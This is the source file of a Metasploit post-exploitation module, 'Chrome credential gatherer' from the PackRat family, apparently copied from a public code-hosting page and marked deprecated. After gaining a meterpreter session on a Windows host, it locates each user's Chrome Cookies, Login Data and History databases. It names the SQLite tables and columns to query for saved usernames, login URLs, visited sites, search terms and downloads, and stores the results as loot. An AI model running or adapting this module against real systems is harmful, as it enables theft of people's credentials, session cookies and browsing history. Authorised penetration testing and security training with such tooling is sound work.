Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# frozen_string_literal: true
2

3
##
4
# This module requires Metasploit: https://metasploit.com/download
5
# Current source: https://github.com/rapid7/metasploit-framework
6
##
7

8
class MetasploitModule < Msf::Post
9
  # this associative array defines the artifacts known to PackRat
10
  include Msf::Post::File
11
  include Msf::Post::Windows::UserProfiles
12
  include Msf::Post::Windows::Packrat
13

14
  include Msf::Exploit::Deprecated
15

16
  deprecated nil, 'The post/windows/gather/enum_browsers module now supersedes this module'
17

18
  ARTIFACTS =
19
    {
20
      application: 'chrome',
21
      app_category: 'browsers',
22
      gatherable_artifacts: [
23
        {
24
          filetypes: 'cookies',
25
          path: 'LocalAppData',
26
          dir: 'Google',
27
          artifact_file_name: 'Cookies',
28
          description: "Chrome's Cookies",
29
          credential_type: 'sqlite',
30
          sql_search: [
31
            {
32
              sql_description: "Database Commands which exports Chrome's Cookie data",
33
              sql_table: 'cookies',
34
              sql_column: 'host_key, name, path'
35
            }
36
          ]
37
        },
38
        {
39
          filetypes: 'logins',
40
          path: 'LocalAppData',
41
          dir: 'Google',
42
          artifact_file_name: 'Login Data',
43
          description: "Chrome's saved Username and Passwords",
44
          credential_type: 'sqlite',
45
          sql_search: [
46
            {
47
              sql_description: "Database Commands which exports Chrome's Login data",
48
              sql_table: 'logins',
49
              sql_column: 'username_value, action_url'
50
            }
51
          ]
52
        },
53
        {
54
          filetypes: 'web_history',
55
          path: 'LocalAppData',
56
          dir: 'Google',
57
          artifact_file_name: 'History',
58
          description: "Chrome's History",
59
          credential_type: 'sqlite',
60
          sql_search: [
61
            {
62
              sql_description: "Database Commands which exports Chrome's Login data",
63
              sql_table: 'urls',
64
              sql_column: 'url'
65
            },
66
            {
67
              sql_description: "Database Commands which exports Chrome's Login data",
68
              sql_table: 'keyword_search_terms',
69
              sql_column: 'lower_term'
70
            },
71
            {
72
              sql_description: "Database Commands which exports Chrome's Login data",
73
              sql_table: 'downloads',
74
              sql_column: 'current_path, tab_referrer_url'
75
            },
76
            {
77
              sql_description: "Database Commands which exports Chrome's Login data",
78
              sql_table: 'segments',
79
              sql_column: 'name'
80
            },
81
            {
82
              sql_description: "Database Commands which exports Chrome's Login data",
83
              sql_table: 'downloads_url_chains',
84
              sql_column: 'url'
85
            }
86
          ]
87
        }
88
      ]
89
    }.freeze
90

91
  def initialize(info = {})
92
    super(
93
      update_info(
94
        info,
95
        'Name' => 'Chrome credential gatherer',
96
        'Description' => %q{
97
          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
98
          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
99
          Further details can be found in the module documentation.
100
          This is a module that searches for credentials stored on Chrome in a windows remote host.
101
        },
102
        'License' => MSF_LICENSE,
103
        'Author' => [
104
          'Kazuyoshi Maruta',
105
          'Daniel Hallsworth',
106
          'Barwar Salim M',
107
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
108
        ],
109
        'Platform' => ['win'],
110
        'SessionTypes' => ['meterpreter'],
111
        'Notes' => {
112
          'Stability' => [CRASH_SAFE],
113
          'Reliability' => [],
114
          'SideEffects' => []
115
        }
116
      )
117
    )
118

119
    register_options(
120
      [
121
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
122
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
123
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
124
        # enumerates the options based on the artifacts that are defined below
125
        OptEnum.new('ARTIFACTS', [
126
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
127
                                                          k[:filetypes]
128
                                                        end.uniq.unshift('All')
129
        ])
130
      ]
131
    )
132
  end
133

134
  def run
135
    print_status('Filtering based on these selections:  ')
136
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
137
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
138
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
139

140
    # used to grab files for each user on the remote host
141
    grab_user_profiles.each do |userprofile|
142
      run_packrat(userprofile, ARTIFACTS)
143
    end
144

145
    print_status 'PackRat credential sweep Completed'
146
  end
147
end
148

149